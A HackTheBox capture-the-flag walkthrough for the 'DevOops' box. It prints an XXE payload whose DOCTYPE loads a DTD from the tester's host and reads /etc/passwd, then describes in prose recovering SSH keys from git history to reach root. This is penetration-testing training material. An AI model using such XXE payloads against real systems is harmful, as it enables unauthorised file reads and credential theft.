DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

SpZ included in categories HackTheBox Writeup

13-10-2018 13-10-2018 481 words 3 minutes

/devoops-box-writeup-walkthrough-htb-hackthebox/featured-image.webp

Contents

This article shows how to hack the DevOops box and obtain both user.txt and root.txt by using Kali Linux.

Introduction

DevOops is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article shows how to hack the DevOops box and get user.txt and root.txt.

Enumeration

First, we use NMAP to Scan the server to identify open ports.

We find that only two port open (22/TCP and 5000/TCP).

Let’s open the browser, and visit http://10.10.10.91:5000/.

It seems to be a website. Then, let’s enumerate the website directory.

After enumeration, we find that there is a page that we can upload XML files.

Hack DevOops BoxS

Obtain User.txt

The website allows users to upload XML files. Let’s try a simple XML first.

1
2
3
4
5


<note>
<Author>Tom</Author>
<Subject>Computer</Subject>
<Content>HowToBuyAMacComputer</Content>
</note>

After we submitted the above file, the website returns a message.

Now, let’s submit our payload.

First, we create a new XML file:

1
2
3
4
5
6
7


<!--?xml version="1.0" ?-->
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]>
<note>
<Author>&b;</Author>
<Subject>Jani</Subject>
<Content>Reminder</Content>
</note>

Then, we create a DTD file (1.dtd) on our local Kali Linux and insert the following content:

1

<!ENTITY b SYSTEM "file:///etc/passwd" >

We host an HTTP service on our local Kali Linux and move the above DTD file in the website folder.

We then submit the request and observe that we read the /etc/passwd file successfully.

Since SSH service is running on the server, I am going to attempt to obtain the ssh key.

Then, we obtain user.txt

Obtain Root.txt

We identify that there is a “git” user, we try to log in as git.

Then, we check the .bash_history file.

We found that git user initial a git repo. Let’s go to this folder and see what we can find.

After navigate to the blogfeed folder, we check the git log.

We find that the user added an ssh key. We then check this commit.

We download the SSH Key and use it to successful log into the target server as root user.

Summary

This box is not difficult, the box has 2 challenges. The first challenge is to create the XXE payload. The second challenge is enumeration and identify the git user. The box also requires some git commands knowledge.

If you want to read more HackTheBox writeup, you can visit this link.